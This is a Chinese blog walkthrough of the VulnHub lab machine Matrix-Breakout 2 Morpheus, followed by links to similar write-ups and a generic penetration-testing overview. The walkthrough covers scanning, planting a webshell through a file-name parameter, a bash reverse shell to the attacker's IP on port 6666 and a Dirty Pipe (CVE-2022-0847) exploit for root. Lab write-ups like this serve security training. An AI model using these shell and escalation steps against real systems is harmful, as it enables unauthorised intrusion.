vulnhub靶场Matrix-Breakout 2 Morpheus通关攻略

最新推荐文章于 2025-07-29 20:44:19 发布
原创 最新推荐文章于 2025-07-29 20:44:19 发布 · 372 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Matrix-Breakout #vulnhub

1.靶场地址

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

2.打开靶场

3.扫描靶机(192.168.159.146为kali的ip)

nmap 192.168.159.146/24

4.探测端口和服务

nmap -p- -sV 192.168.159.157

发现三个端口开启

5.目录扫描

dirsearch -u 192.168.159.157

6.查看网页

没找到什么有用的东西

7.继续目录扫描

用gobuster

gobuster dir -u http://192.168.159.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

继续扫描,gobuster字典更大

8.访问网站

9.抓包分析

发现会将内容写入txt中

10.访问graffiti.txt

11.修改文件名

抓包产生是否能修改file参数

12.上传木马

可以访问到

13.链接蚁剑

14.上传文件

上传shell.sh

bash -i >& /dev/tcp/192.168.159.146/6666 0>&1

15.kali监听

在kali监听6666端口

nc -lvnp 6666

运行命令

bash /tmp/shell.sh

16.查看内核版本

uname -a

发现漏洞

17.下载上传

https://github.com/r1is/CVE-2022-0847

下载运行即可

vulnhub靶场breakout
China_I_LOVE的博客
11-25 1198
养成经常看页面源代码的习惯涉及到简单的密码破解,可以增长记忆,这里是brainenum4linux的使用,可以清晰的看到SMB的好多内容结合收集到的所有信息进行尝试,这里只给出网站,并且可登录,就根据自己的信息去尝试对于登录到网站系统中的时候,对于网站的功能,都点击进行测试,比如有修改密码等操作时,就可以抓包分析妥善使用compgen -c来获取当前用户的可用命令,配合grep进行筛选记得一些敏感文件的常用关键字,如密码,可能文件名中就有pass命令getcap的使用,附在最后吧反弹。
VulnHub-matrix-breakout-2-morpheus通关攻略
m0_66808441的博客
03-19 989
【代码】VulnHub-matrix-breakout-2-morpheus通关攻略
Vulnhub靶场matrix-breakout-2-morpheus
qq_69775412的博客
10-17 1019
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
靶场-Matrix-v3
weixin_58602402的博客
06-14 226
5.将生成的公钥权限进行提升,并利用trinity用户的cp命令将公钥放在trinity用户的家目录下。7.查看trinity用户使用的sudo命令,发现用户可以无密码以root身份执行oracle下的命令。直接将/usr/bin/bash复制到trinity家目录下并改名为oracle,赋予执行权限。利用guest用户生成一个ssh密钥,位置为/home/guest/.ssh/id_rsa。2.查看当前用户使用的sudo命令,发现trinity用户无密码使用/bin/cp命令。
Matrix3靶场
zjxxxy的博客
06-14 169
vulnhub靶场Matrix3攻略
Vulnhub项目:Breakout
Ays.Ie的博客
04-15 489
本篇记录了vulhub靶机:breakout的整个渗透过程,希望能够帮助到有需要的人
【安全】VulnHub靶场 - Matrix-Breakout: 2 Morpheus
风舞雪凌月的博客
05-08 866
你扮演的特尼狄(Trinity)试图调查尼布甲尼撒号(Nebuchadnezzar )上的一台电脑,赛费尔(Cypher )把其他人都锁在了电脑里,而这台电脑是解开谜团的关键。常规尝试一下对ssh登录进行弱口令爆破,用户名就用故事背景的Trinity、Cypher和root,找个弱口令字典,意料之中的不成功。这里暂时没有更好的攻击面了,只能选择使用更大的字典继续爆破目录,发现有两个文件。有一张图片,下载之后发现有隐藏的数据,是一个商标信息,暂时无法利用。下载发现图片隐写了一个zlib文件,这里就不会做了。
2024年网安最全【网络安全】Vulnhub靶场matrix-breakout-2-morpheus
2401_84265972的博客
05-01 1032
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
Vulnhub靶场实战—matrix-breakout-2-morpheus
weixin_71914594的博客
10-27 628
靶场下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/靶场下载连接: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova攻击机IP:192.168.237.137靶机IP:192.168.237.165。
vulnhub靶场1:matrix-breakout-2-morpheus
Genarior的专栏
02-22 864
vulnhub - matrix-breakout-2-morpheus靶场记录
VulnhubBREAKOUT靶机
qq_63283137的博客
10-10 653
smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。
vulnhub靶场Matrix-Breakout 2 Morpheus教程
xnxqwzy的博客
02-25 1867
靶场搭建直接解压双击ova文件即可使用软件:VMware(可能会出现问题),(此处官方建议使用VirtualBox)难度:中等攻击机:kali* 信息收集为了方便我直接使用windows上的lansee直接扫描出目标靶机ip!lansee扫描结果去除已知靶机ip剩下的就是目标靶机当然需要访问看看!访问结果看看源码能出现啥!192.168.21.134网页主页源码没有什么有用的看看nmap能看出来啥!nmap简单扫描结果看看端口详细信息!nmap扫描到的详细信息。
vulnhub靶场之EMPIRE:BREAKOUT
qq_58091216的博客
01-29 1315
在Linux中,能力是一种粒度更细的权限系统,用于授予进程执行特定操作的权限,而不是传统的用户和组权限模型。我们已经有了用户的密码,所以我们要着手寻找用户名了,由于靶机开放了smb服务,所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举: Enum4linux 可以列出目标系统上的用户和组,包括一些敏感信息,如用户ID(UID)、组ID(GID)、用户描述等。10000端口和20000端口是不同的登录系统,一个是登录网站的,一个是登录用户的。
vulnhub breakout
qq_62144749的博客
08-15 1428
1
打靶分享:VulnHub-Breakout
weixin_66249173的博客
02-02 1808
最终在/var/backups目录下发现了一个.old_pass.bak看着像个密码,但是没有查看权限,此时我就想到了可以用tar进行压缩再解压,最终得到了一个密码,猜测是root密码。在 Linux 中,文件能力允许进程执行一些超出普通权限的操作,而无需完全的超级用户权限。SMB 协议通常用于在局域网中实现文件和打印机共享,而 Samba 则是 Linux 和其他类 Unix 系统上的一个实现,发现就是个普通的界面,查看源码(这里要仔细查看,并且翻到底。切换时发现会出现失败的情况,所以反弹shell。
VulnHub BREAKOUT
人若无名,便可专心练剑
10-07 175
然后使用这个用户名和之前得到的密码尝试登录Webmin,发现可以登进20000端口的Webmin服务。后来发现在/var/backups/目录下有一个.old_pass.bak文件,但没有读取权限。,因此它可以读取任意文件(利用该tar 打包再解压就可以查看没有权限查看的文件内容)得到密码,使用su 获得root shell,拿到flag。通过ls -la 发现有tar和user.txt。也是个登录界面,和10000端口的不一样。user.txt里面是user的flag。发现有一个cmd 执行命令的。
Vulnhub 02-Breakout靶机渗透攻略详解
最新发布
2201_75617121的博客
07-29 558
摘要:本文记录了从下载Empire靶机到最终获取root权限的完整渗透测试过程。主要包括:1)配置靶机网络环境并扫描发现目标IP;2)通过nmap扫描发现开放端口(80/139/445/10000/20000);3)使用gobuster进行目录扫描,在网页源码中发现Brainfuck编码的密码;4)通过enum4linux找到cyber账户,利用20000端口成功登录;5)在/var/backups目录发现备份密码实现提权。最终通过获取的密码以root身份登录系统,完成渗透测试。
VulnHub靶机渗透实战7-BREAKOUT
随心所欲不逾矩
11-18 443
靶机超级简单。靶机和Kali桥接。
Matrix-Breakout-2-Morpheus靶机进行渗透测试
12-13
Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. 信息收集(Reconnaissance) 在开始渗透测试之前,首先需要进行信息收集。信息收集的目的是尽可能多地了解目标系统,包括操作系统类型、开放端口、服务版本等。 - **使用Nmap扫描端口**:Nmap是一个强大的网络扫描工具,可以扫描目标系统的开放端口和服务。 ```sh nmap -sS -sV -O <目标IP> ``` - **使用Nikto扫描Web漏洞**:Nikto是一个Web服务器扫描工具,可以扫描常见的Web漏洞。 ```sh nikto -h <目标IP> ``` ### 2. 漏洞扫描(Vulnerability Scanning) 在信息收集的基础上,进行漏洞扫描,识别系统中的已知漏洞。 - **使用OpenVAS进行漏洞扫描**:OpenVAS是一个开源的漏洞扫描工具,可以自动扫描系统中的漏洞。 ```sh openvas-scan <目标IP> ``` ### 3. 漏洞利用(Exploitation) 一旦识别出系统中的漏洞,就可以尝试利用这些漏洞来获取系统的访问权限。 - **使用Metasploit进行漏洞利用**:Metasploit是一个流行的渗透测试框架,提供了大量的漏洞利用模块。 ```sh msfconsole use exploit/<模块名称> set RHOST <目标IP> set PAYLOAD <有效载荷> exploit ``` ### 4. 权限提升(Privilege Escalation) 获取系统访问权限后,通常需要提升权限以获得更高的访问级别。 - **使用本地提权工具**:例如,Linux系统中的`sudo -l`命令可以查看当前用户可以执行的命令,Windows系统中的`whoami /priv`命令可以查看当前用户的权限。 ### 5. 后渗透操作(Post-Exploitation) 在获取系统权限后,可以进行后渗透操作,例如数据窃取、系统破坏等。 - **使用Meterpreter进行后渗透操作**:Meterpreter是Metasploit中的一个后渗透模块,提供了丰富的功能。 ```sh meterpreter > sysinfo meterpreter > download <文件路径> ``` ### 6. 报告(Reporting) 最后,生成渗透测试报告,详细记录测试过程中发现的问题和漏洞,并提出修复建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值